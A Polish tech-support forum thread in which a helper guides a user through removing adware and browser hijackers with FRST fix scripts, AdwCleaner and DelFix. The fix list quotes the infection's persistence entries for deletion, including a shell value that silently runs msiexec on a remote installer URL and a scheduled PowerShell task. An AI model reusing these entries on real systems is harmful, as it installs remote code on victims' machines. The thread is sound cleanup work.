instalowanie się chrome, firefox" i inne programy typu "BigFarm"

[miring]

Od jakiegoś czasu instalują się same programy takie jak: chrome i firefox, próbowałem je usuwać  ale bez skutku. Po restarcie windowsa instalują się znowu  pod inna nazwa folderu (Zoohair, a teraz Eggper). Ostatnio dodatkowo doszły dwie gry: "Bigfarm" i "big_bang_empire". 

Pozdrawiam

 

*uaktualniłem "logi"

Addition.txt

FRST.txt

GMER.txt

Shortcut.txt

[miring]

Witam. Dziękuję uprzejmie osobom, które do tej pory zaangażowały się w moją sprawę jednocześnie proszę o usunięcie tego posta oraz wcześniejszego z dnia 12 maja 2017 r. Nie chciał bym aby moje raporty zalegały na serwerach.

Dziękuję i pozdrawiam wszystkich.

[picasso]

Jeśli nadal potrzebujesz pomocy, zajmę się tym tematem teraz. Proszę potwierdź czy to nadal aktualne. Jeśli tak, nowe raporty FRST są potrzebne.

[miring]

Aktualne nadal... (raporty zrobię tylko troszkę to potrwa. Sprzęt ma już wąsy i brodę). Oczywiście w kwestii datku miałem sam pisać... ale nie było jakby odzewu wiec wiadomo.

 

Raporty dodałem. Jak coś brakuje proszę mi podpowiedzieć co mam zrobić.

 

Pozdrawiam M.I.

Addition.txt

FRST.txt

Shortcut.txt

GMER wstęp.txt

GMER pełny.txt

[picasso]

Działania do przeprowadzenia:

 

1. Przez Panel sterowania odinstaluj adware: AlphaGo, amuleC, WinSnare. Jeśli będzie jakiś problem z deinstalacją, kontynuuj i przejdź do działań wyliczonych poniżej.

 

2. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

CloseProcesses:
R2 BIT; C:\ProgramData\BIT\BIT.dll [1812992 2017-05-17] (TODO: ) [brak podpisu cyfrowego] 
S2 CSHMDR; C:\Users\MI\AppData\Local\CSHMDR\Snare.dll [900096 2017-05-22] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] 
S2 CWASRE; C:\Users\MI\AppData\Local\CWASRE\Snare.dll [828416 2017-05-17] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] 
R2 FirefoxU; C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe [110592 2017-05-23] () [brak podpisu cyfrowego] 
R2 IISvr; C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795\Installers\IIS\iisexp.dll [105472 2017-05-04] () [brak podpisu cyfrowego]
R2 Kitty; C:\Users\MI\AppData\Local\Kitty\Kitty.dll [124928 2017-05-04] (kitty) [brak podpisu cyfrowego] 
R2 MSLN; C:\ProgramData\Microsoft\Blend\14.0\1033\ResourceCache.dll [399360 2017-01-04] () [brak podpisu cyfrowego]
S2 NPASRE; C:\Users\MI\AppData\Local\NPASRE\Snare.dll [830464 2017-05-10] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] 
S2 snare; C:\Users\MI\AppData\Local\snare\Snare.dll [898048 2017-05-25] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] 
S2 terana; C:\Users\MI\AppData\Local\terana\terana.dll [909312 2017-05-31] (IntertSect Alliance Pty Ltd) [brak podpisu cyfrowego] 
R2 VNASRE; C:\Users\MI\AppData\Local\VNASRE\Snare.dll [826368 2017-05-09] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] 
R2 WANARE; C:\Users\MI\AppData\Local\WANARE\Snare.dll [826368 2017-05-05] (InterSect Alliance Pty Ltd) [brak podpisu cyfrowego] 
R2 WinAppSvr; C:\ProgramData\Microsoft\AppV\sym\dbg.dll [109056 2017-05-12] (TODO: ) [brak podpisu cyfrowego] 
R2 WinSAPSvc; C:\Users\MI\AppData\Roaming\WinSAPSvc\WinSAP.dll [1887232 2017-05-17] () [brak podpisu cyfrowego] 
S0 Avguniva; system32\DRIVERS\avguniva.sys [X]
U3 idsvc; Brak ImagePath
S1 iSafeKrnlMon; \??\C:\Program Files (x86)\Elex-tech\YAC\iSafeKrnlMon.sys [X] 
S1 mvlwfqjo; \??\C:\WINDOWS\system32\drivers\mvlwfqjo.sys [X]
U2 WinSnare; Brak ImagePath
HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\Run: [background_fault] => C:\Users\MI\AppData\Local\background_fault\aswRD.exe [1419576 2017-05-04] (AVAST Software) 
HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\Policies\system: [shell] explorer.exe,msiexec.exe /i http://point.ltdmsjq.com/?data=zDlkMj8dMdk4FdkdRkZYF8M1FdExOYU2NTNWRTkdMWU2MUJSRH== /q
IFEO\GoogleUpdate.exe: [Debugger] 324095823984.exe
IFEO\GoogleUpdaterService.exe: [Debugger] 8736459873644.exe
GroupPolicy: Ograniczenia 
Task: {011BBC71-739E-4862-B5F3-2F2DFFE57E7B} - System32\Tasks\NosemayUpdateTaskMachineUA => C:\Program Files (x86)\Nosemay\Update\NosemayUpdate.exe 
Task: {017D2570-02DE-476E-A42B-37771FF2B192} - \OfficeSoftwareProtectionPlatform\SvcRestartTask -> Brak pliku 
Task: {01C995FF-D178-4E7B-AC4A-9E950006A207} - System32\Tasks\Microsoft\Windows\Media Center\ObjectStoreRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {0837D897-84CB-4E30-A8DD-807937A81DFC} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate => %SystemRoot%\ehome\mcupdate.exe
Task: {0F1FC558-90E6-41AA-8D37-4FBE69053762} - System32\Tasks\Microsoft\Windows\Media Center\PeriodicScanRetry => %windir%\ehome\MCUpdate.exe
Task: {148318FC-5974-4508-A415-B3AFD16E5DDB} - System32\Tasks\Microsoft\Windows\Media Center\OCURActivate => %SystemRoot%\ehome\ehPrivJob.exe
Task: {19E783A3-8AEE-4CB8-8B5D-F114E00BAB33} - System32\Tasks\Microsoft\Windows\Media Center\mcupdate_scheduled => %SystemRoot%\ehome\mcupdate.exe
Task: {1F96044A-9E15-42EC-886D-441BAFAFECED} - \Microsoft\Windows\Setup\gwx\refreshgwxcontent -> Brak pliku 
Task: {29308477-8F7E-4D4F-92D5-F1534E61B6F5} - System32\Tasks\Microsoft\Windows\Media Center\ActivateWindowsSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {30212503-2AEC-4B16-848E-334D882D6A53} - \Microsoft\Windows\Setup\GWXTriggers\Logon-5d -> Brak pliku 
Task: {3C9616B2-742C-4820-AFAE-F3D2459E9677} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {3D966D87-5FE5-4FBC-8E90-DB0F48E454DB} - System32\Tasks\Microsoft\Windows\Media Center\RegisterSearch => %SystemRoot%\ehome\ehPrivJob.exe
Task: {3E3E65EA-6693-4ACC-947D-206853F50D65} - System32\Tasks\Microsoft\Windows\Media Center\ReindexSearchRoot => %SystemRoot%\ehome\ehPrivJob.exe
Task: {42145BE5-4059-431F-919A-1A381C5966DE} - System32\Tasks\Microsoft\Windows\Media Center\SqlLiteRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {4CCE8DE9-7207-4EA6-8407-BDF2684DFE81} - \Microsoft\Windows\Setup\gwx\launchtrayprocess -> Brak pliku 
Task: {6FECF9BE-AED8-4627-80ED-91FF5361960F} - System32\Tasks\Microsoft\Windows\Media Center\OCURDiscovery => %SystemRoot%\ehome\ehPrivJob.exe
Task: {773492A6-4F08-4DAF-9C1B-778BC17ACAED} - System32\Tasks\Microsoft\Windows\Media Center\DispatchRecoveryTasks => %SystemRoot%\ehome\ehPrivJob.exe
Task: {78588675-6CF3-4E50-B5B1-1EC34EAA2F6B} - System32\Tasks\Microsoft\Windows\Media Center\InstallPlayReady => %SystemRoot%\ehome\ehPrivJob.exe
Task: {7DDF9673-8D0B-4652-B795-1BEAD1206B65} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW1 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {8AB44150-345F-44E5-ABC3-8235DE5E1DE5} - System32\Tasks\NosemayUpdateTaskMachineCore => C:\Program Files (x86)\Nosemay\Update\NosemayUpdate.exe 
Task: {94C0CB8F-6430-43CD-8CE0-B5A9EDCB5063} - \Microsoft\Windows\Setup\gwx\refreshgwxconfig -> Brak pliku 
Task: {9521AF5F-3377-4704-92B9-8835155CFFE6} - System32\Tasks\Windows-PG => powershell.exe C:\windows\psgo\psgo.ps1
Task: {A8561EA2-FFCC-479F-A8F3-0D1E90CA4B10} - System32\Tasks\OneDrive Standalone Update Task => C:\Users\MI\AppData\Local\Microsoft\OneDrive\17.3.6517.0809\OneDriveStandaloneUpdater.exe
Task: {AA921623-B84A-4EC8-A6DA-5D46323FC6D9} - System32\Tasks\Microsoft\Windows\Media Center\UpdateRecordPath => %SystemRoot%\ehome\ehPrivJob.exe
Task: {B201CD42-5792-43BE-97D6-74AB486671CA} - \Microsoft\Windows\Setup\GWXTriggers\MachineUnlock-5d -> Brak pliku 
Task: {B40C4875-485A-4120-A48B-4E4E32ED8612} - \Microsoft\Windows\Setup\GWXTriggers\Telemetry-4xd -> Brak pliku 
Task: {C778374C-94FE-41B0-B705-5FC952201AC0} - System32\Tasks\Microsoft\Windows\Media Center\PvrScheduleTask => %SystemRoot%\ehome\mcupdate.exe
Task: {D9B027D3-E4DD-42DB-B655-6506173D10B0} - \Microsoft\Windows\Setup\GWXTriggers\Time-5d -> Brak pliku 
Task: {DB65ACDE-0DF5-4CB0-9415-9658810D1A58} - System32\Tasks\Milimili => C:\Program Files (x86)\MIO\MIO.exe [2017-05-17] () 
Task: {DC3DCC2C-6D40-43C1-9BE5-076B5E2044B0} - \Microsoft\Windows\Setup\GWXTriggers\OutOfIdle-5d -> Brak pliku 
Task: {DD548504-31EE-43FF-A573-1E9BCB56DC76} - System32\Tasks\Microsoft\Windows\Media Center\RecordingRestart => %SystemRoot%\ehome\ehrec.exe
Task: {E899BB27-DB02-4C11-A531-A261D6E8D363} - \Microsoft\Windows\Setup\GWXTriggers\OutOfSleep-5d -> Brak pliku 
Task: {E959E007-A71C-4952-8EA8-22DE146D6227} - System32\Tasks\Microsoft\Windows\Media Center\PBDADiscoveryW2 => %SystemRoot%\ehome\ehPrivJob.exe
Task: {F0496437-71B1-4E96-9E9C-3BC2F52CDE46} - System32\Tasks\Microsoft\Windows\Media Center\PvrRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {F52B9841-800B-4073-B588-B3A2B9DAFB2E} - \Microsoft\Windows\Setup\GWXTriggers\refreshgwxconfig-B -> Brak pliku 
Task: {FA831EE3-8E47-422C-913B-86BF798418B5} - \Microsoft\Windows\Setup\gwx\refreshgwxconfigandcontent -> Brak pliku 
Task: {FACB8164-0888-403B-B4E6-7F59329EA90F} - System32\Tasks\Microsoft\Windows\Media Center\ehDRMInit => %SystemRoot%\ehome\ehPrivJob.exe
Task: {FBC8485F-A585-489F-8E2C-C65FEABC1BEF} - System32\Tasks\Microsoft\Windows\Media Center\MediaCenterRecoveryTask => %SystemRoot%\ehome\mcupdate.exe
Task: {FFEE4F98-789F-4BC5-9EBF-91D4AC658C46} - System32\Tasks\Microsoft\Windows\Media Center\ConfigureInternetTimeService => %SystemRoot%\ehome\ehPrivJob.exe
HKLM\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C
HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms}
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C
HKLM\Software\Microsoft\Internet Explorer\Main,Default_Search_URL =
HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms}
HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Search Page = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms}
HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Start Page = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C
HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Default_Page_URL = hxxp://www.ourluckysites.com/?type=hp&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C
HKU\S-1-5-21-570807183-2887973835-1248124564-1000\Software\Microsoft\Internet Explorer\Main,Default_Search_URL = hxxp://www.ourluckysites.com/search/?type=ds&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C&q={searchTerms}
SearchScopes: HKLM -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKLM-x32 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> DefaultScope {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
SearchScopes: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> {33BB0A4E-99AF-4226-BDF6-49120163DE86} URL = hxxp://www.bing.com/search?q={searchTerms}&form=MSERBM&pc=MSERT1
StartMenuInternet: IEXPLORE.EXE - c:\program files\internet explorer\iexplore.exe hxxp://www.ourluckysites.com/?type=sc&ts=1496219886&z=05b1940ea6a6615f7e82dc7gez4tfqcoegft1b8bfq&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C
ShortcutWithArgument: C:\Users\MI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Accessories\Internet Explorer.lnk -> C:\Program Files\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1494843707&z=1535c9995935171be08905dg8z1tbzdb4z6c6mdecw&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C
ShortcutWithArgument: C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Launch Internet Explorer Browser.lnk -> C:\Program Files (x86)\Internet Explorer\iexplore.exe (Microsoft Corporation) -> hxxp://www.ourluckysites.com/?type=sc&ts=1493980801&z=0d0af53e82a59639deac3edg4z5tdceteb8eab5ece&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C
Edge HomeButtonPage: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> hxxp://www.nuesearch.com/?type=hp&ts=1473244319&z=1fd95696a597e865f3e8157gdzem5c7o7z0z8c4gab&from=che0812&uid=ST9500325AS_5VE4KX5CXXXX5VE4KX5C
Edge Session Restore: HKU\S-1-5-21-570807183-2887973835-1248124564-1000 -> [funkcja włączona]
HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\ChromeHTML: -> C:\Program Files (x86)\Eggper\Application\chrome.exe (Google Inc.) 
HKU\S-1-5-21-570807183-2887973835-1248124564-1000\...\StartMenuInternet\ChromeHTML: -> C:\Program Files (x86)\Eggper\Application\chrome.exe (Google Inc.) 
Reg: reg export "HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy" C:\Users\MI\Desktop\edge.reg
DeleteKey: HKCU\Software\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Microsoft\Shared Tools\MSConfig\startupreg
DeleteKey: HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Schedule\TaskCache\Tree\Microsoft\Windows\Media Center
DeleteKey: HKLM\SOFTWARE\MozillaPlugins
DeleteKey: HKLM\SOFTWARE\Wow6432Node\MozillaPlugins
DeleteKey: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\OpenSearch
DeleteValue: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy|ProtectedHomepages
DeleteValue: HKCU\Software\Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.microsoftedge_8wekyb3d8bbwe\MicrosoftEdge\Protected - It is a violation of Windows Policy to modify. See aka.ms/browserpolicy|ProtectedSearchScopes
C:\Program Files (x86)\GUT5E88.tmp
C:\Program Files (x86)\metadata
C:\Program Files (x86)\settings.dat
C:\Program Files (x86)\AlphaGo
C:\Program Files (x86)\Default Company Name
C:\Program Files (x86)\Eggper
C:\Program Files (x86)\Firefox
C:\Program Files (x86)\Google
C:\Program Files (x86)\MIO
C:\Program Files (x86)\Nosemay
C:\ProgramData\BIT
C:\ProgramData\Microsoft\AppV
C:\ProgramData\Microsoft\Blend
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Google Chrome.lnk
C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Mozilla Firefox.lnk
C:\ProgramData\Package Cache\{59399776-575D-9C54-E861-0D5EAB7E707D}v10.1.14393.795
C:\Users\MI\AppData\Local\background_fault
C:\Users\MI\AppData\Local\CSHMDR
C:\Users\MI\AppData\Local\CWASRE
C:\Users\MI\AppData\Local\Eggper
C:\Users\MI\AppData\Local\Google
C:\Users\MI\AppData\Local\Kitty
C:\Users\MI\AppData\Local\NPASRE
C:\Users\MI\AppData\Local\SNARE
C:\Users\MI\AppData\Local\terana
C:\Users\MI\AppData\Local\VNASRE
C:\Users\MI\AppData\LocalLow\Mozilla
C:\Users\MI\AppData\Roaming\ICSW_1Q1F1S1C1P1E1C1F1N1C1T1H2UtF1E1ItJ1V0O1E1P1C1T1V0I0C.txt
C:\Users\MI\AppData\Roaming\Firefox
C:\Users\MI\AppData\Roaming\WinSAPSvc
C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\Google Chrome.lnk
C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Google Chrome.lnk
C:\Users\MI\AppData\Roaming\Microsoft\Internet Explorer\Quick Launch\User Pinned\TaskBar\Mozilla Firefox.lnk
C:\Users\MI\Desktop\BigFarm.lnk
C:\Users\MI\Desktop\big_bang_empire.lnk
C:\Users\Public\Desktop\Mozilla Firefox.lnk
C:\Users\Public\Documents\report.dat
C:\Users\Public\Documents\temp.dat
C:\WINDOWS\ehome
C:\WINDOWS\psgo
C:\WINDOWS\system32\Drivers\aatkrykk.sys
C:\WINDOWS\System32\Tasks\Microsoft\Windows\Media Center
C:\WINDOWS\SysWOW64\1
C:\WINDOWS\SysWOW64\1111
C:\WINDOWS\SysWOW64\2222
C:\WINDOWS\SysWOW64\3333
CMD: netsh advfirewall reset
Hosts:
EmptyTemp:

 

Adnotacja dla innych czytających: skrypt unikatowy - dopasowany tylko i wyłącznie pod ten system, proszę nie stosować na swoich systemach.

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Czekaj cierpliwie, nie przerywaj działania. Gdy Fix ukończy pracę, nastąpi restart systemu. W tym samym katalogu skąd uruchamiano FRST powstanie plik fixlog.txt.

 

3. Ustaw Internet Explorer jako domyślną przeglądarkę.

 

4. Zrób nowe logi FRST:

 

- Standardowe z opcji Skanuj (Scan), bez Shortcut.

- W polu Szukaj (Search) wklej co poniżej i klik w Szukaj w rejestrze (Search Registry). Przedstaw wynikowy SearchReg.txt.

 

Eggper;Firefox

 

Dołącz też plik fixlog.txt. Na Pulpicie pojawił się również plik edge.reg - shostuj go gdzieś i podaj link do pliku.

[miring]

Droga Koleżanko zrobiłem wszystko wg instrukcji. W załączeniu raporty. Jeszcze zrobię hosta dla edge.reg i podam link... ale to chwilka bo nie korzystałem z hostów...

Pozdrawiam serdecznie.

 

Jakoś poszło... link:

https://megawrzuta.pl/download/172980b78adc88dcd3a7708e512a24a3.html

 

Jeszcze raz pozdrawiam.

Addition.txt

Fixlog.txt

FRST.txt

SearchReg.txt

[picasso]

Wszystko pomyślnie wykonane, adware usunięte. Teraz poprawki:

 

1. Uruchom FRST. Z klawiatury CTRL+Y, zostanie otworzony plik fixlist.txt. Wklej do pliku następującą treść:

 

DeleteKey: HKLM\SOFTWARE\Mozilla
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Eggper
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Firefox
DeleteKey: HKLM\SOFTWARE\WOW6432Node\Mozilla
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\ftp
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\http
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\https
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\irc
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\mailto
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\mms
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\news
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\nntp
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\sms
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\smsto
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\tel
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\urn
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\webcal
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Eggper
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Firefox
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Mozilla
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Internet Explorer\LowRegistry\Audio\PolicyConfig\PropertyStore\37de59f2_0
DeleteKey: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Search\RecentApps\{1A49764D-CF78-4AD5-94D6-68A341A9ECCC}
DeleteValue: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Classes\Local Settings\Software\Microsoft\Windows\Shell\MuiCache|C:\Program Files (x86)\Firefox\Firefox.exe.FriendlyAppName
DeleteValue: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\bin\FirefoxUpdate.exe
DeleteValue: HKU\S-1-5-21-570807183-2887973835-1248124564-1000\SOFTWARE\Microsoft\Windows NT\CurrentVersion\AppCompatFlags\Compatibility Assistant\Store|C:\Program Files (x86)\Firefox\uninstall\helper.exe
U2 CSHMDR; Brak ImagePath
U2 CWASRE; Brak ImagePath
U2 snare; Brak ImagePath
U2 WinSnare; Brak ImagePath
RemoveDirectory: C:\FRST\Quarantine
CMD: del /q "C:\Users\MI\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Powiadomienia monitorowania tuszu - .lnk"

 

Z klawiatury CTRL+S, by zapisać zmiany. Następnie w oknie FRST klik w Napraw (Fix). Przedstaw wynikowy fixlog.txt.

 

2. Uruchom AdwCleaner. Wybierz opcję Skanuj i dostarcz log wynikowy z folderu C:\AdwCleaner.

[miring]

Koleżanko zrobiłem wszystko wg instrukcji. W załącznikach raporty.

 

Pozdrawiam M.I.

 

Ps. ostatni wcześniejszy raport AdwCleaner był z 25/01/2017 _adwcleaner_6.042..... jakieś wcześniejsze skanowania nie związane z tym problemem.

Fixlog.txt

AdwCleanerS4.txt

[picasso]

1. AdwCleaner wykrył jeszcze inne odpadki adware - uruchom go ponownie i tym razem zastosuj po kolei opcje Skanuj + Oczyść. Gdy program ukończy zadanie:

 

2. Przez SHIFT+DEL (omija Kosz) skasuj FRST z katalogu D:\Programy\skanowanie komputera i raporty. Następnie zastosuj DelFix.

 

To wszystko.

[miring]

Zrobione!

 

Czyżby to wszystko?

 

DelFix.txt

[picasso]

Skasuj z dysku plik C:\delfix.txt.

 

To wszystko.

[miring]

Plik skasowano. Dziękuję niezmiernie. Pozdrowienia z Rzeszowa.